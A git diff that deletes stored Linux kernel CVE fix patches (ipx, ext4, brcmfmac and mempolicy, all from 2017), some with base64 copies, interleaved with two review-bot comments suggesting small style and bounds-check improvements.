keyring directly to a credentials struct. -+ * Install a process keyring to the given credentials struct if it didn't have -+ * one already. 
This is allowed to overrun the quota. - * -- * Returns -EEXIST if there was already a process keyring, 0 if one installed, -- * and other value on any other error -+ * Return: 0 if a process keyring is now present; -errno on failure. - */ - int install_process_keyring_to_cred(struct cred *new) - { - struct key *keyring; - - if (new->process_keyring) -- return -EEXIST; -+ return 0; - - keyring = keyring_alloc("_pid", new->uid, new->gid, new, - KEY_POS_ALL | KEY_USR_VIEW, -@@ -189,11 +194,9 @@ int install_process_keyring_to_cred(struct cred *new) - } - - /* -- * Make sure a process keyring is installed for the current process. The -- * existing process keyring is not replaced. -+ * Install a process keyring to the current task if it didn't have one already. - * -- * Returns 0 if there is a process keyring by the end of this function, some -- * error otherwise. -+ * Return: 0 if a process keyring is now present; -errno on failure. - */ - static int install_process_keyring(void) - { -@@ -207,14 +210,18 @@ static int install_process_keyring(void) - ret = install_process_keyring_to_cred(new); - if (ret < 0) { - abort_creds(new); -- return ret != -EEXIST ? ret : 0; -+ return ret; - } - - return commit_creds(new); - } - - /* -- * Install a session keyring directly to a credentials struct. -+ * Install the given keyring as the session keyring of the given credentials -+ * struct, replacing the existing one if any. If the given keyring is NULL, -+ * then install a new anonymous session keyring. -+ * -+ * Return: 0 on success; -errno on failure. - */ - int install_session_keyring_to_cred(struct cred *cred, struct key *keyring) - { -@@ -249,8 +256,11 @@ int install_session_keyring_to_cred(struct cred *cred, struct key *keyring) - } - - /* -- * Install a session keyring, discarding the old one. If a keyring is not -- * supplied, an empty one is invented. -+ * Install the given keyring as the session keyring of the current task, -+ * replacing the existing one if any. 
If the given keyring is NULL, then -+ * install a new anonymous session keyring. -+ * -+ * Return: 0 on success; -errno on failure. - */ - static int install_session_keyring(struct key *keyring) - { --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch deleted file mode 100644 index f91b0b84..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7487/ANY/0001.patch +++ /dev/null @@ -1,38 +0,0 @@ -From ee0d8d8482345ff97a75a7d747efc309f13b0d80 Mon Sep 17 00:00:00 2001 -From: Dan Carpenter -Date: Tue, 2 May 2017 13:58:53 +0300 -Subject: ipx: call ipxitf_put() in ioctl error path -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -We should call ipxitf_put() if the copy_to_user() fails. - -Reported-by: 李强 -Signed-off-by: Dan Carpenter -Signed-off-by: David S. Miller ---- - net/ipx/af_ipx.c | 5 ++--- - 1 file changed, 2 insertions(+), 3 deletions(-) - -diff --git a/net/ipx/af_ipx.c b/net/ipx/af_ipx.c -index 8a9219f..fa31ef2 100644 ---- a/net/ipx/af_ipx.c -+++ b/net/ipx/af_ipx.c -@@ -1168,11 +1168,10 @@ static int ipxitf_ioctl(unsigned int cmd, void __user *arg) - sipx->sipx_network = ipxif->if_netnum; - memcpy(sipx->sipx_node, ipxif->if_node, - sizeof(sipx->sipx_node)); -- rc = -EFAULT; -+ rc = 0; - if (copy_to_user(arg, &ifr, sizeof(ifr))) -- break; -+ rc = -EFAULT; - ipxitf_put(ipxif); -- rc = 0; - break; - } - case SIOCAIPXITFCRT: --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch deleted file mode 100644 index 6204174f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch +++ /dev/null 
@@ -1,87 +0,0 @@ -From 3127779c064c6358310e542c725fe1f64dd6a60f Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 17 Sep 2001 00:00:00 +0200 -Subject: [PATCH] ext4: fix data exposure after a crash - -commit 06bd3c36a733ac27962fea7d6f47168841376824 upstream. - -Huang has reported that in his powerfail testing he is seeing stale -block contents in some of recently allocated blocks although he mounts -ext4 in data=ordered mode. After some investigation I have found out -that indeed when delayed allocation is used, we don't add inode to -transaction's list of inodes needing flushing before commit. Originally -we were doing that but commit f3b59291a69d removed the logic with a -flawed argument that it is not needed. - -The problem is that although for delayed allocated blocks we write their -contents immediately after allocating them, there is no guarantee that -the IO scheduler or device doesn't reorder things and thus transaction -allocating blocks and attaching them to inode can reach stable storage -before actual block contents. Actually whenever we attach freshly -allocated blocks to inode using a written extent, we should add inode to -transaction's ordered inode list to make sure we properly wait for block -contents to be written before committing the transaction. So that is -what we do in this patch. This also handles other cases where stale data -exposure was possible - like filling hole via mmap in -data=ordered,nodelalloc mode. - -The only exception to the above rule are extending direct IO writes where -blkdev_direct_IO() waits for IO to complete before increasing i_size and -thus stale data exposure is not possible. For now we don't complicate -the code with optimizing this special case since the overhead is pretty -low. In case this is observed to be a performance problem we can always -handle it using a special flag to ext4_map_blocks(). 
- -Change-Id: I9f8b371c9fd716bf3d8af3780ce43e73d80cfb28 -Fixes: f3b59291a69d0b734be1fc8be489fef2dd846d3d -Reported-by: "HUANG Weller (CM/ESW12-CN)" -Tested-by: "HUANG Weller (CM/ESW12-CN)" -Signed-off-by: Jan Kara -Signed-off-by: Theodore Ts'o -[bwh: Backported to 3.16: - - Drop check for EXT4_GET_BLOCKS_ZERO flag - - Adjust context] -Signed-off-by: Ben Hutchings ---- - -diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c -index 9d358dc..f472aed 100644 ---- a/fs/ext4/inode.c -+++ b/fs/ext4/inode.c -@@ -661,6 +661,20 @@ - ret = check_block_validity(inode, map); - if (ret != 0) - return ret; -+ -+ /* -+ * Inodes with freshly allocated blocks where contents will be -+ * visible after transaction commit must be on transaction's -+ * ordered data list. -+ */ -+ if (map->m_flags & EXT4_MAP_NEW && -+ !(map->m_flags & EXT4_MAP_UNWRITTEN) && -+ !IS_NOQUOTA(inode) && -+ ext4_should_order_data(inode)) { -+ ret = ext4_jbd2_file_inode(handle, inode); -+ if (ret) -+ return ret; -+ } - } - return retval; - } -@@ -1116,15 +1130,6 @@ - int i_size_changed = 0; - - trace_ext4_write_end(inode, pos, len, copied); -- if (ext4_test_inode_state(inode, EXT4_STATE_ORDERED_MODE)) { -- ret = ext4_jbd2_file_inode(handle, inode); -- if (ret) { -- unlock_page(page); -- page_cache_release(page); -- goto errout; -- } -- } -- - if (ext4_has_inline_data(inode)) { - ret = ext4_write_inline_data_end(inode, pos, len, - copied, page); diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64 deleted file mode 100644 index 9708ac07..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0001.patch.base64 +++ /dev/null 
@@ -1 +0,0 @@ -RnJvbSAzMTI3Nzc5YzA2NGM2MzU4MzEwZTU0MmM3MjVmZTFmNjRkZDZhNjBmIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBKYW4gS2FyYSA8amFja0BzdXNlLmN6PgpEYXRlOiBNb24sIDE3IFNlcCAyMDAxIDAwOjAwOjAwICswMjAwClN1YmplY3Q6IFtQQVRDSF0gZXh0NDogZml4IGRhdGEgZXhwb3N1cmUgYWZ0ZXIgYSBjcmFzaAoKY29tbWl0IDA2YmQzYzM2YTczM2FjMjc5NjJmZWE3ZDZmNDcxNjg4NDEzNzY4MjQgdXBzdHJlYW0uCgpIdWFuZyBoYXMgcmVwb3J0ZWQgdGhhdCBpbiBoaXMgcG93ZXJmYWlsIHRlc3RpbmcgaGUgaXMgc2VlaW5nIHN0YWxlCmJsb2NrIGNvbnRlbnRzIGluIHNvbWUgb2YgcmVjZW50bHkgYWxsb2NhdGVkIGJsb2NrcyBhbHRob3VnaCBoZSBtb3VudHMKZXh0NCBpbiBkYXRhPW9yZGVyZWQgbW9kZS4gQWZ0ZXIgc29tZSBpbnZlc3RpZ2F0aW9uIEkgaGF2ZSBmb3VuZCBvdXQKdGhhdCBpbmRlZWQgd2hlbiBkZWxheWVkIGFsbG9jYXRpb24gaXMgdXNlZCwgd2UgZG9uJ3QgYWRkIGlub2RlIHRvCnRyYW5zYWN0aW9uJ3MgbGlzdCBvZiBpbm9kZXMgbmVlZGluZyBmbHVzaGluZyBiZWZvcmUgY29tbWl0LiBPcmlnaW5hbGx5CndlIHdlcmUgZG9pbmcgdGhhdCBidXQgY29tbWl0IGYzYjU5MjkxYTY5ZCByZW1vdmVkIHRoZSBsb2dpYyB3aXRoIGEKZmxhd2VkIGFyZ3VtZW50IHRoYXQgaXQgaXMgbm90IG5lZWRlZC4KClRoZSBwcm9ibGVtIGlzIHRoYXQgYWx0aG91Z2ggZm9yIGRlbGF5ZWQgYWxsb2NhdGVkIGJsb2NrcyB3ZSB3cml0ZSB0aGVpcgpjb250ZW50cyBpbW1lZGlhdGVseSBhZnRlciBhbGxvY2F0aW5nIHRoZW0sIHRoZXJlIGlzIG5vIGd1YXJhbnRlZSB0aGF0CnRoZSBJTyBzY2hlZHVsZXIgb3IgZGV2aWNlIGRvZXNuJ3QgcmVvcmRlciB0aGluZ3MgYW5kIHRodXMgdHJhbnNhY3Rpb24KYWxsb2NhdGluZyBibG9ja3MgYW5kIGF0dGFjaGluZyB0aGVtIHRvIGlub2RlIGNhbiByZWFjaCBzdGFibGUgc3RvcmFnZQpiZWZvcmUgYWN0dWFsIGJsb2NrIGNvbnRlbnRzLiBBY3R1YWxseSB3aGVuZXZlciB3ZSBhdHRhY2ggZnJlc2hseQphbGxvY2F0ZWQgYmxvY2tzIHRvIGlub2RlIHVzaW5nIGEgd3JpdHRlbiBleHRlbnQsIHdlIHNob3VsZCBhZGQgaW5vZGUgdG8KdHJhbnNhY3Rpb24ncyBvcmRlcmVkIGlub2RlIGxpc3QgdG8gbWFrZSBzdXJlIHdlIHByb3Blcmx5IHdhaXQgZm9yIGJsb2NrCmNvbnRlbnRzIHRvIGJlIHdyaXR0ZW4gYmVmb3JlIGNvbW1pdHRpbmcgdGhlIHRyYW5zYWN0aW9uLiBTbyB0aGF0IGlzCndoYXQgd2UgZG8gaW4gdGhpcyBwYXRjaC4gVGhpcyBhbHNvIGhhbmRsZXMgb3RoZXIgY2FzZXMgd2hlcmUgc3RhbGUgZGF0YQpleHBvc3VyZSB3YXMgcG9zc2libGUgLSBsaWtlIGZpbGxpbmcgaG9sZSB2aWEgbW1hcCBpbgpkYXRhPW9yZGVyZWQsbm9kZWxhbGxvYyBtb2RlLgoKVGhlIG9ubHkgZXhjZXB0aW9uIHRvIHRoZSBhYm92ZSBydWxlIGFyZSBleHRlbmRpbmcgZGlyZ
WN0IElPIHdyaXRlcyB3aGVyZQpibGtkZXZfZGlyZWN0X0lPKCkgd2FpdHMgZm9yIElPIHRvIGNvbXBsZXRlIGJlZm9yZSBpbmNyZWFzaW5nIGlfc2l6ZSBhbmQKdGh1cyBzdGFsZSBkYXRhIGV4cG9zdXJlIGlzIG5vdCBwb3NzaWJsZS4gRm9yIG5vdyB3ZSBkb24ndCBjb21wbGljYXRlCnRoZSBjb2RlIHdpdGggb3B0aW1pemluZyB0aGlzIHNwZWNpYWwgY2FzZSBzaW5jZSB0aGUgb3ZlcmhlYWQgaXMgcHJldHR5Cmxvdy4gSW4gY2FzZSB0aGlzIGlzIG9ic2VydmVkIHRvIGJlIGEgcGVyZm9ybWFuY2UgcHJvYmxlbSB3ZSBjYW4gYWx3YXlzCmhhbmRsZSBpdCB1c2luZyBhIHNwZWNpYWwgZmxhZyB0byBleHQ0X21hcF9ibG9ja3MoKS4KCkNoYW5nZS1JZDogSTlmOGIzNzFjOWZkNzE2YmYzZDhhZjM3ODBjZTQzZTczZDgwY2ZiMjgKRml4ZXM6IGYzYjU5MjkxYTY5ZDBiNzM0YmUxZmM4YmU0ODlmZWYyZGQ4NDZkM2QKUmVwb3J0ZWQtYnk6ICJIVUFORyBXZWxsZXIgKENNL0VTVzEyLUNOKSIgPFdlbGxlci5IdWFuZ0Bjbi5ib3NjaC5jb20+ClRlc3RlZC1ieTogIkhVQU5HIFdlbGxlciAoQ00vRVNXMTItQ04pIiA8V2VsbGVyLkh1YW5nQGNuLmJvc2NoLmNvbT4KU2lnbmVkLW9mZi1ieTogSmFuIEthcmEgPGphY2tAc3VzZS5jej4KU2lnbmVkLW9mZi1ieTogVGhlb2RvcmUgVHMnbyA8dHl0c29AbWl0LmVkdT4KW2J3aDogQmFja3BvcnRlZCB0byAzLjE2OgogLSBEcm9wIGNoZWNrIGZvciBFWFQ0X0dFVF9CTE9DS1NfWkVSTyBmbGFnCiAtIEFkanVzdCBjb250ZXh0XQpTaWduZWQtb2ZmLWJ5OiBCZW4gSHV0Y2hpbmdzIDxiZW5AZGVjYWRlbnQub3JnLnVrPgotLS0KCmRpZmYgLS1naXQgYS9mcy9leHQ0L2lub2RlLmMgYi9mcy9leHQ0L2lub2RlLmMKaW5kZXggOWQzNThkYy4uZjQ3MmFlZCAxMDA2NDQKLS0tIGEvZnMvZXh0NC9pbm9kZS5jCisrKyBiL2ZzL2V4dDQvaW5vZGUuYwpAQCAtNjYxLDYgKzY2MSwyMCBAQAogCQlyZXQgPSBjaGVja19ibG9ja192YWxpZGl0eShpbm9kZSwgbWFwKTsKIAkJaWYgKHJldCAhPSAwKQogCQkJcmV0dXJuIHJldDsKKworCQkvKgorCQkgKiBJbm9kZXMgd2l0aCBmcmVzaGx5IGFsbG9jYXRlZCBibG9ja3Mgd2hlcmUgY29udGVudHMgd2lsbCBiZQorCQkgKiB2aXNpYmxlIGFmdGVyIHRyYW5zYWN0aW9uIGNvbW1pdCBtdXN0IGJlIG9uIHRyYW5zYWN0aW9uJ3MKKwkJICogb3JkZXJlZCBkYXRhIGxpc3QuCisJCSAqLworCQlpZiAobWFwLT5tX2ZsYWdzICYgRVhUNF9NQVBfTkVXICYmCisJCSAgICAhKG1hcC0+bV9mbGFncyAmIEVYVDRfTUFQX1VOV1JJVFRFTikgJiYKKwkJICAgICFJU19OT1FVT1RBKGlub2RlKSAmJgorCQkgICAgZXh0NF9zaG91bGRfb3JkZXJfZGF0YShpbm9kZSkpIHsKKwkJCXJldCA9IGV4dDRfamJkMl9maWxlX2lub2RlKGhhbmRsZSwgaW5vZGUpOworCQkJaWYgKHJldCkKKwkJCQlyZXR1cm4gcmV0OworCQl9CiAJfQogCXJldHVybiByZXR2YWw7CiB9CkBAIC0xMTE2LDE1ICsxMTMwLDYgQEAKI
AlpbnQgaV9zaXplX2NoYW5nZWQgPSAwOwogCiAJdHJhY2VfZXh0NF93cml0ZV9lbmQoaW5vZGUsIHBvcywgbGVuLCBjb3BpZWQpOwotCWlmIChleHQ0X3Rlc3RfaW5vZGVfc3RhdGUoaW5vZGUsIEVYVDRfU1RBVEVfT1JERVJFRF9NT0RFKSkgewotCQlyZXQgPSBleHQ0X2piZDJfZmlsZV9pbm9kZShoYW5kbGUsIGlub2RlKTsKLQkJaWYgKHJldCkgewotCQkJdW5sb2NrX3BhZ2UocGFnZSk7Ci0JCQlwYWdlX2NhY2hlX3JlbGVhc2UocGFnZSk7Ci0JCQlnb3RvIGVycm91dDsKLQkJfQotCX0KLQogCWlmIChleHQ0X2hhc19pbmxpbmVfZGF0YShpbm9kZSkpIHsKIAkJcmV0ID0gZXh0NF93cml0ZV9pbmxpbmVfZGF0YV9lbmQoaW5vZGUsIHBvcywgbGVuLAogCQkJCQkJIGNvcGllZCwgcGFnZSk7Cg== \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch deleted file mode 100644 index b56d5a52..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch +++ /dev/null 
@@ -1,77 +0,0 @@ -From df6099279dc346ec77158d5f52d3176dbd0a1e4c Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Mon, 04 Jul 2016 10:14:01 -0400 -Subject: [PATCH] ext4: fix deadlock during page writeback - -[ Upstream commit 646caa9c8e196880b41cd3e3d33a2ebc752bdb85 ] - -Commit 06bd3c36a733 (ext4: fix data exposure after a crash) uncovered a -deadlock in ext4_writepages() which was previously much harder to hit. -After this commit xfstest generic/130 reproduces the deadlock on small -filesystems. - -The problem happens when ext4_do_update_inode() sets LARGE_FILE feature -and marks current inode handle as synchronous. That subsequently results -in ext4_journal_stop() called from ext4_writepages() to block waiting for -transaction commit while still holding page locks, reference to io_end, -and some prepared bio in mpd structure each of which can possibly block -transaction commit from completing and thus results in deadlock. - -Fix the problem by releasing page locks, io_end reference, and -submitting prepared bio before calling ext4_journal_stop(). - -[ Changed to defer the call to ext4_journal_stop() only if the handle - is synchronous. --tytso ] - -Change-Id: I724640d96ffaa03e512cd0b48cea056b4030c382 -Reported-and-tested-by: Eryu Guan -Signed-off-by: Theodore Ts'o -CC: stable@vger.kernel.org -Signed-off-by: Jan Kara -Signed-off-by: Sasha Levin ---- - -diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c -index f472aed..5aa499f 100644 ---- a/fs/ext4/inode.c -+++ b/fs/ext4/inode.c -@@ -2554,13 +2554,36 @@ - done = true; - } - } -- ext4_journal_stop(handle); -+ /* -+ * Caution: If the handle is synchronous, -+ * ext4_journal_stop() can wait for transaction commit -+ * to finish which may depend on writeback of pages to -+ * complete or on page lock to be released. 
In that -+ * case, we have to wait until after after we have -+ * submitted all the IO, released page locks we hold, -+ * and dropped io_end reference (for extent conversion -+ * to be able to complete) before stopping the handle. -+ */ -+ if (!ext4_handle_valid(handle) || handle->h_sync == 0) { -+ ext4_journal_stop(handle); -+ handle = NULL; -+ } - /* Submit prepared bio */ - ext4_io_submit(&mpd.io_submit); - /* Unlock pages we didn't use */ - mpage_release_unused_pages(&mpd, give_up_on_write); -- /* Drop our io_end reference we got from init */ -- ext4_put_io_end(mpd.io_submit.io_end); -+ /* -+ * Drop our io_end reference we got from init. We have -+ * to be careful and use deferred io_end finishing if -+ * we are still holding the transaction as we can -+ * release the last reference to io_end which may end -+ * up doing unwritten extent conversion. -+ */ -+ if (handle) { -+ ext4_put_io_end_defer(mpd.io_submit.io_end); -+ ext4_journal_stop(handle); -+ } else -+ ext4_put_io_end(mpd.io_submit.io_end); - - if (ret == -ENOSPC && sbi->s_journal) { - /* diff --git a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64 deleted file mode 100644 index 70d51e63..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7495/3.18/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch b/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch deleted file mode 100644 index d501826e..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7495/^4.6/0003.patch +++ /dev/null 
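Review bot: The new comment above the `h_sync` test repeats a word ("we have to wait until after after we have submitted all the IO"), and the closing `if (handle) { ... } else ext4_put_io_end(...)` pairs a braced branch with an unbraced one. The comment should read `we have to wait until after we have`, and the else branch should be braced like the if: `} else {`, `ext4_put_io_end(mpd.io_submit.io_end);`, `}`. The ordering of the deferred put and the journal stop is the subtle part of this fix, so matching braces make it harder to break in a later edit. The enclosing function starts and ends outside the hunk.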
@@ -1,87 +0,0 @@ -From 06bd3c36a733ac27962fea7d6f47168841376824 Mon Sep 17 00:00:00 2001 -From: Jan Kara -Date: Sun, 24 Apr 2016 00:56:03 -0400 -Subject: ext4: fix data exposure after a crash - -Huang has reported that in his powerfail testing he is seeing stale -block contents in some of recently allocated blocks although he mounts -ext4 in data=ordered mode. After some investigation I have found out -that indeed when delayed allocation is used, we don't add inode to -transaction's list of inodes needing flushing before commit. Originally -we were doing that but commit f3b59291a69d removed the logic with a -flawed argument that it is not needed. - -The problem is that although for delayed allocated blocks we write their -contents immediately after allocating them, there is no guarantee that -the IO scheduler or device doesn't reorder things and thus transaction -allocating blocks and attaching them to inode can reach stable storage -before actual block contents. Actually whenever we attach freshly -allocated blocks to inode using a written extent, we should add inode to -transaction's ordered inode list to make sure we properly wait for block -contents to be written before committing the transaction. So that is -what we do in this patch. This also handles other cases where stale data -exposure was possible - like filling hole via mmap in -data=ordered,nodelalloc mode. - -The only exception to the above rule are extending direct IO writes where -blkdev_direct_IO() waits for IO to complete before increasing i_size and -thus stale data exposure is not possible. For now we don't complicate -the code with optimizing this special case since the overhead is pretty -low. In case this is observed to be a performance problem we can always -handle it using a special flag to ext4_map_blocks(). 
- -CC: stable@vger.kernel.org -Fixes: f3b59291a69d0b734be1fc8be489fef2dd846d3d -Reported-by: "HUANG Weller (CM/ESW12-CN)" -Tested-by: "HUANG Weller (CM/ESW12-CN)" -Signed-off-by: Jan Kara -Signed-off-by: Theodore Ts'o ---- - fs/ext4/inode.c | 24 +++++++++++++++--------- - 1 file changed, 15 insertions(+), 9 deletions(-) - -diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c -index 981a1fc..250c2df 100644 ---- a/fs/ext4/inode.c -+++ b/fs/ext4/inode.c -@@ -684,6 +684,21 @@ out_sem: - ret = check_block_validity(inode, map); - if (ret != 0) - return ret; -+ -+ /* -+ * Inodes with freshly allocated blocks where contents will be -+ * visible after transaction commit must be on transaction's -+ * ordered data list. -+ */ -+ if (map->m_flags & EXT4_MAP_NEW && -+ !(map->m_flags & EXT4_MAP_UNWRITTEN) && -+ !(flags & EXT4_GET_BLOCKS_ZERO) && -+ !IS_NOQUOTA(inode) && -+ ext4_should_order_data(inode)) { -+ ret = ext4_jbd2_file_inode(handle, inode); -+ if (ret) -+ return ret; -+ } - } - return retval; - } -@@ -1289,15 +1304,6 @@ static int ext4_write_end(struct file *file, - int i_size_changed = 0; - - trace_ext4_write_end(inode, pos, len, copied); -- if (ext4_test_inode_state(inode, EXT4_STATE_ORDERED_MODE)) { -- ret = ext4_jbd2_file_inode(handle, inode); -- if (ret) { -- unlock_page(page); -- put_page(page); -- goto errout; -- } -- } -- - if (ext4_has_inline_data(inode)) { - ret = ext4_write_inline_data_end(inode, pos, len, - copied, page); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch deleted file mode 100644 index 8f982048..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7541/3.10/0002.patch +++ /dev/null 
@@ -1,50 +0,0 @@ -From 7136ca73ff3496758b56f60b6fe76d675e69cd21 Mon Sep 17 00:00:00 2001 -From: Arend van Spriel -Date: Fri, 7 Jul 2017 21:09:06 +0100 -Subject: brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -commit 8f44c9a41386729fea410e688959ddaa9d51be7c upstream. - -The lower level nl80211 code in cfg80211 ensures that "len" is between -25 and NL80211_ATTR_FRAME (2304). We subtract DOT11_MGMT_HDR_LEN (24) from -"len" so thats's max of 2280. However, the action_frame->data[] buffer is -only BRCMF_FIL_ACTION_FRAME_SIZE (1800) bytes long so this memcpy() can -overflow. - - memcpy(action_frame->data, &buf[DOT11_MGMT_HDR_LEN], - le16_to_cpu(action_frame->len)); - -Cc: stable@vger.kernel.org # 3.9.x -Fixes: 18e2f61db3b70 ("brcmfmac: P2P action frame tx.") -Reported-by: "freenerguo(郭大兴)" -Signed-off-by: Arend van Spriel -Signed-off-by: David S. Miller -[wt: s/cfg80211.c/wl_cfg80211.c in 3.10] - -Signed-off-by: Willy Tarreau ---- - drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c | 5 +++++ - 1 file changed, 5 insertions(+) - -diff --git a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c -index 2c52430..8afb609 100644 ---- a/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c -+++ b/drivers/net/wireless/brcm80211/brcmfmac/wl_cfg80211.c -@@ -4019,6 +4019,11 @@ brcmf_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, - cfg80211_mgmt_tx_status(wdev, *cookie, buf, len, true, - GFP_KERNEL); - } else if (ieee80211_is_action(mgmt->frame_control)) { -+ if (len > BRCMF_FIL_ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN) { -+ brcmf_err("invalid action frame length\n"); -+ err = -EINVAL; -+ goto exit; -+ } - af_params = kzalloc(sizeof(*af_params), GFP_KERNEL); - if (af_params == NULL) { - brcmf_err("unable to allocate frame\n"); --- -cgit v1.1 - 
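Review bot: The length check added to brcmf_cfg80211_mgmt_tx() bounds `len` only from above. The later subtraction of DOT11_MGMT_HDR_LEN therefore still depends on the caller never passing a frame shorter than the header, which the commit message states for cfg80211 but this function does not enforce. Stating the lower bound in the same test keeps the copy safe if that guarantee changes: `if (len < DOT11_MGMT_HDR_LEN || len > BRCMF_FIL_ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN) {`. The same applies to the identical hunk in the ^4.12 copy of this patch further down. The rest of the function, including the `exit` label, is outside the hunk.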
diff --git a/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch b/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch deleted file mode 100644 index 33661483..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7541/^4.12/0001.patch +++ /dev/null 
@@ -1,45 +0,0 @@ -From 8f44c9a41386729fea410e688959ddaa9d51be7c Mon Sep 17 00:00:00 2001 -From: Arend van Spriel -Date: Fri, 7 Jul 2017 21:09:06 +0100 -Subject: brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -The lower level nl80211 code in cfg80211 ensures that "len" is between -25 and NL80211_ATTR_FRAME (2304). We subtract DOT11_MGMT_HDR_LEN (24) from -"len" so thats's max of 2280. However, the action_frame->data[] buffer is -only BRCMF_FIL_ACTION_FRAME_SIZE (1800) bytes long so this memcpy() can -overflow. - - memcpy(action_frame->data, &buf[DOT11_MGMT_HDR_LEN], - le16_to_cpu(action_frame->len)); - -Cc: stable@vger.kernel.org # 3.9.x -Fixes: 18e2f61db3b70 ("brcmfmac: P2P action frame tx.") -Reported-by: "freenerguo(郭大兴)" -Signed-off-by: Arend van Spriel -Signed-off-by: David S. Miller ---- - drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c | 5 +++++ - 1 file changed, 5 insertions(+) - -diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c -index dcde596..7e689c8 100644 ---- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c -+++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c -@@ -4934,6 +4934,11 @@ brcmf_cfg80211_mgmt_tx(struct wiphy *wiphy, struct wireless_dev *wdev, - cfg80211_mgmt_tx_status(wdev, *cookie, buf, len, true, - GFP_KERNEL); - } else if (ieee80211_is_action(mgmt->frame_control)) { -+ if (len > BRCMF_FIL_ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN) { -+ brcmf_err("invalid action frame length\n"); -+ err = -EINVAL; -+ goto exit; -+ } - af_params = kzalloc(sizeof(*af_params), GFP_KERNEL); - if (af_params == NULL) { - brcmf_err("unable to allocate frame\n"); --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch deleted file mode 100644 index 97b6ec6f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-7616/^4.10/0001.patch +++ /dev/null 
@@ -1,76 +0,0 @@ -From cf01fb9985e8deb25ccf0ea54d916b8871ae0e62 Mon Sep 17 00:00:00 2001 -From: Chris Salls -Date: Fri, 7 Apr 2017 23:48:11 -0700 -Subject: mm/mempolicy.c: fix error handling in set_mempolicy and mbind. - -In the case that compat_get_bitmap fails we do not want to copy the -bitmap to the user as it will contain uninitialized stack data and leak -sensitive data. - -Signed-off-by: Chris Salls -Signed-off-by: Linus Torvalds ---- - mm/mempolicy.c | 20 ++++++++------------ - 1 file changed, 8 insertions(+), 12 deletions(-) - -diff --git a/mm/mempolicy.c b/mm/mempolicy.c -index 75b2745..37d0b33 100644 ---- a/mm/mempolicy.c -+++ b/mm/mempolicy.c -@@ -1529,7 +1529,6 @@ COMPAT_SYSCALL_DEFINE5(get_mempolicy, int __user *, policy, - COMPAT_SYSCALL_DEFINE3(set_mempolicy, int, mode, compat_ulong_t __user *, nmask, - compat_ulong_t, maxnode) - { -- long err = 0; - unsigned long __user *nm = NULL; - unsigned long nr_bits, alloc_size; - DECLARE_BITMAP(bm, MAX_NUMNODES); -@@ -1538,14 +1537,13 @@ COMPAT_SYSCALL_DEFINE3(set_mempolicy, int, mode, compat_ulong_t __user *, nmask, - alloc_size = ALIGN(nr_bits, BITS_PER_LONG) / 8; - - if (nmask) { -- err = compat_get_bitmap(bm, nmask, nr_bits); -+ if (compat_get_bitmap(bm, nmask, nr_bits)) -+ return -EFAULT; - nm = compat_alloc_user_space(alloc_size); -- err |= copy_to_user(nm, bm, alloc_size); -+ if (copy_to_user(nm, bm, alloc_size)) -+ return -EFAULT; - } - -- if (err) -- return -EFAULT; -- - return sys_set_mempolicy(mode, nm, nr_bits+1); - } - -@@ -1553,7 +1551,6 @@ COMPAT_SYSCALL_DEFINE6(mbind, compat_ulong_t, start, 